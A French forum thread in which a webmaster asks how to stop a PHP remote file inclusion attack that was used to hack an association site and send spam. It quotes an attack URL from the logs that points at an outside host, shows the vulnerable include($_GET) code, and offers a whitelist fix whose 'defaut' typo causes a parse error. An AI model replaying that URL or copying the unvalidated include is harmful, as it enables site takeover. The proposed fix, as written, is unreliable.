cs_h2n
Messages postés4Date d'inscriptionvendredi 3 novembre 2006StatutMembreDernière intervention 5 novembre 2006
-
3 nov. 2006 à 20:20
cs_h2n
Messages postés4Date d'inscriptionvendredi 3 novembre 2006StatutMembreDernière intervention 5 novembre 2006
-
5 nov. 2006 à 20:52
Bonjour,
Je crois que ma demande est simpliste et va faire sourire plus d'un!
J'ai 3 sites PHP pour des asssos heberges par OVH.
Ovh m'a envoyé un message pour me dire que du spam etait envoye du serveur en question de mon site et un des trois sites avait ete hacke.
En regardant les logs sur Google analytics j'ai remarque des URL étranges n'appartenant pas aux sites étaient appelles.
Par example : /index.php?page=http://rst.void.ru/download/r Comment est ce que je peux interdire tout URL comme variable dans mon code?
audayls
Messages postés373Date d'inscriptionsamedi 9 juillet 2005StatutMembreDernière intervention11 août 2008 3 nov. 2006 à 23:29
Salut,
Tu as du certainement laissé la faille include. Il suffit de remplacer "include($_GET['page']);" par un switch du genre "
switch($_GET['page']) {
case 'page1': include('page1.php'); break;
case 'page2.php': include('page2.php'); break;
// etc...
defaut: include('accueil.php'); break;// Ici la page par defaut si la variable ne correspond à rien de voulu
}
"
Au pire tu peux mettre (en plus de la modification au dessus) un Anti-Leech sur tes sites, par empecher l'accès au variables extérieurs.
cs_h2n
Messages postés4Date d'inscriptionvendredi 3 novembre 2006StatutMembreDernière intervention 5 novembre 2006 5 nov. 2006 à 01:12
Merci beaucoup [auteurdetail.aspx?ID=547458 audayls], [auteurdetail.aspx?ID=370989 sim51], et [auteurdetail.aspx?ID=358866 FhX],
J'ai remplacer dans ma page le code
<?php
if (!$_GET["page"])
{
include ("event.inc");
}
else
{
include ($_GET["page"].".inc");
}
?>
Par
<?php
switch($_GET["page"]) {
case "about": include("about.inc"); break;
case "co-chair": include("co-chair.inc"); break;
case "contact": include("coontact.inc"); break;
case "event": include("event.inc"); break;
case "links": include("links.inc"); break;
case "membership": include("membership.inc"); break;
case "past": include("past.inc"); break;
case "sendemail": include("sendemail.inc"); break;
case "upcoming": include("upcoming.inc"); break;
// etc...
defaut : include("event.inc"); break;
// Ici la page par defaut si la variable ne correspond à rien de voulu
}
?>
Je dois avoir fait une erreur car lorsque j'essaie d'accéder a la page j'ai le message d'erreur suivant:
Parse error: syntax error, unexpected ':' in /home.2/gsbwinec/www/index.php on line 47